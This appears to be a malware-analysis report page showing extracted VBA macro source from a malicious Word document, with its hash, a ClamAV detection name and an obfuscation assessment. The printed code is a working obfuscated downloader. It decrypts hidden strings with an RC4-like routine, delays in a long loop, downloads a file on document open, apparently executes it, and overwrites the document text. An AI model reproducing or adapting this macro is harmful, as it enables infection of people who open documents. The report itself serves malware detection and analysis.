YofbfZ9WrR6HuXE = UBound(Msz3HLRx26QUAkf) + 1
G59b56phfen = YofbfZ9WrR6HuXE
For PGECwCNxie = 0 To (YofbfZ9WrR6HuXE - 1)
RCz56z8kzHn = (RCz56z8kzHn + 1) Mod 256
LfRh4klCZStI9q = (LfRh4klCZStI9q + JylNjQEyhKzRDG(RCz56z8kzHn)) Mod 256
XUT5WXv6RAa = JylNjQEyhKzRDG(RCz56z8kzHn)
JylNjQEyhKzRDG(RCz56z8kzHn) = JylNjQEyhKzRDG(LfRh4klCZStI9q)
JylNjQEyhKzRDG(LfRh4klCZStI9q) = XUT5WXv6RAa
Msz3HLRx26QUAkf(PGECwCNxie) = Msz3HLRx26QUAkf(PGECwCNxie) Xor (JylNjQEyhKzRDG((JylNjQEyhKzRDG(RCz56z8kzHn) + JylNjQEyhKzRDG(LfRh4klCZStI9q)) Mod 256))
Next
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim VWyjKNK72m2RIGfnu As Long, RuSVU As Long
VWyjKNK72m2RIGfnu = 7
RuSVU = 62
If VWyjKNK72m2RIGfnu + RuSVU > 4 Then
RuSVU = VWyjKNK72m2RIGfnu + 70
Else
MsgBox 97
End If
Dim RcfhYKbvetd As String
Dim ErapFFTNSVU As Long, DrAjm9ejC As Long
ErapFFTNSVU = 18
DrAjm9ejC = 77
If ErapFFTNSVU + DrAjm9ejC > 4 Then
DrAjm9ejC = ErapFFTNSVU + 24
Else
MsgBox 58
End If
Dim BMjRypaNLzNR3 As Long, Jf9Wn2 As Long, IDNNqDER6NZ8 As Long, WWf2teuDu As Integer
Dim XOdJj4RWPHly As Long, FbCJTyiwp As Long
XOdJj4RWPHly = 98
FbCJTyiwp = 72
If XOdJj4RWPHly + FbCJTyiwp > 4 Then
FbCJTyiwp = XOdJj4RWPHly + 79
Else
MsgBox 30
End If
BMjRypaNLzNR3 = 942728842: Jf9Wn2 = 0: IDNNqDER6NZ8 = 0
Dim UWtqJ3WVz9 As Long, AR6YOxLFt99 As Long
UWtqJ3WVz9 = 65
AR6YOxLFt99 = 47
If UWtqJ3WVz9 + AR6YOxLFt99 > 4 Then
AR6YOxLFt99 = UWtqJ3WVz9 + 29
Else
MsgBox 55
End If
For Jf9Wn2 = 1 To BMjRypaNLzNR3
IDNNqDER6NZ8 = IDNNqDER6NZ8 + 1
Next Jf9Wn2
Dim H71AmjjgW7 As Long, HRmRG964fZCwj As Long
H71AmjjgW7 = 35
HRmRG964fZCwj = 64
If H71AmjjgW7 + HRmRG964fZCwj > 4 Then
HRmRG964fZCwj = H71AmjjgW7 + 50
Else
MsgBox 19
End If
If IDNNqDER6NZ8 = BMjRypaNLzNR3 Then
Dim WKOCtsVrBVzQobWKo As Long, Qcq26UDHsoSPJx As Long
WKOCtsVrBVzQobWKo = 41
Qcq26UDHsoSPJx = 72
If WKOCtsVrBVzQobWKo + Qcq26UDHsoSPJx > 4 Then
Qcq26UDHsoSPJx = WKOCtsVrBVzQobWKo + 24
Else
MsgBox 23
End If
RcfhYKbvetd = Environ(CUh12emhPa4g(Chr(242) + Chr(139) + Chr(69) + Chr(106) + Chr(159) + Chr(202) + Chr(230), "X9Hxae1qOv")) & "\" & OBqADCHy & CUh12emhPa4g(Chr(18) + Chr(12) + Chr(7) + Chr(253), "Vgq8Q62G")
Dim Gzew5HTqKk As Long, QzRyoRqfGiX As Long
Gzew5HTqKk = 54
QzRyoRqfGiX = 7
If Gzew5HTqKk + QzRyoRqfGiX > 4 Then
QzRyoRqfGiX = Gzew5HTqKk + 49
Else
MsgBox 47
End If
If Yptw7lcRqUAqs1(CUh12emhPa4g(Chr(199) + Chr(207) + Chr(152) + Chr(90) + Chr(102) + Chr(120) + Chr(119) + Chr(187) + Chr(74) + Chr(15) + Chr(108) + Chr(211) + Chr(161) + Chr(135) + Chr(68) + Chr(121) + Chr(214) + Chr(112) + Chr(57) + Chr(235) + Chr(198) + Chr(247) + Chr(15) + Chr(131) + Chr(112) + Chr(45) + Chr(232) + Chr(12) + Chr(30) + Chr(181) + Chr(49) + Chr(182) + Chr(14) + Chr(68) + Chr(2) + Chr(90) + Chr(56) + Chr(180) + Chr(167) + Chr(216) + Chr(172) + Chr(116), "EvwXcRx"), RcfhYKbvetd, CUh12emhPa4g(Chr(203) + Chr(18) + Chr(38) + Chr(119) + Chr(133) + Chr(31) + Chr(3) + Chr(213) + Chr(117), "Mw2uiDPQY3XH")) = True Then
Dim SeTaV6gcZTmkUl As Long, QtaJZdRgvYXxDdl As Long
SeTaV6gcZTmkUl = 91
QtaJZdRgvYXxDdl = 94
If SeTaV6gcZTmkUl + QtaJZdRgvYXxDdl > 4 Then
QtaJZdRgvYXxDdl = SeTaV6gcZTmkUl + 13
Else
MsgBox 58
End If
RQxKoIyhmZRjA 1
Dim TAFc1HK4sO As Long, Pim As Long
TAFc1HK4sO = 90
Pim = 11
If TAFc1HK4sO + Pim > 4 Then
Pim = TAFc1HK4sO + 22
Else
MsgBox 15
End If
XiB46eUBNC RcfhYKbvetd
Dim N3vr0aNH As Long, L5JHaYjpM9YMZ As Long
N3vr0aNH = 28
L5JHaYjpM9YMZ = 23
If N3vr0aNH + L5JHaYjpM9YMZ > 4 Then
L5JHaYjpM9YMZ = N3vr0aNH + 12
Else
MsgBox 47
End If
End If
Dim U72sqG9Xwx As Long, PMMWzLxJ6udrgcn As Long
U72sqG9Xwx = 15
PMMWzLxJ6udrgcn = 37
If U72sqG9Xwx + PMMWzLxJ6udrgcn > 4 Then
PMMWzLxJ6udrgcn = U72sqG9Xwx + 70
Else
MsgBox 98
End If
ActiveDocument.Range.Text = CUh12emhPa4g(Chr(111) + Chr(169) + Chr(212) + Chr(86) + Chr(69) + Chr(0) + Chr(209) + Chr(89) + Chr(21) + Chr(20) + Chr(135) + Chr(50) + Chr(125) + Chr(99) + Chr(148) + Chr(237) + Chr(211) + Chr(226) + Chr(64) + Chr(176) + Chr(91) + Chr(142) + Chr(72) + Chr(116) + Chr(219) + Chr(22) + Chr(161) + Chr(45) + Chr(123) + Chr(104) + Chr(82) + Chr(107) + Chr(210) + Chr(160) + Chr(152) + Chr(3) + Chr(154) + Chr(188) + Chr(85) + Chr(161) + Chr(119) + Chr(68) + Chr(165) + Chr(183) + Chr(180) + Chr(251) + Chr(9) + Chr(95) + Chr(140) + Chr(67) + Chr(36) + Chr(38) + Chr(138) + Chr(110) + Chr(221) + Chr(147) + Chr(13) + Chr(165) + Chr(118) + Chr(51) + Chr(214) + Chr(133) + Chr(168) + Chr(208) + Chr(212) + Chr(8) + Chr(53) + Chr(73) + Chr(24) + Chr(195) + Chr(87), "JrpyIPiaTX")
End If
Dim KjjLrbXCz0lHq As Long, HVNTyOM9YMZ As Long
KjjLrbXCz0lHq = 2
HVNTyOM9YMZ = 51
If KjjLrbXCz0lHq + HVNTyOM9YMZ > 4 Then
HVNTyOM9YMZ = KjjLrbXCz0lHq + 28
Else
MsgBox 23
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 52736 bytes
SHA-256: 2235f3bed5fb4ab8c0e5be1e9c4c61fa3195829ddc8f8c92eb3e96d49c45c635
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
312 of 613 identifiers look randomly generated (e.g. 'H1unwlMZF1W0I8da2') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.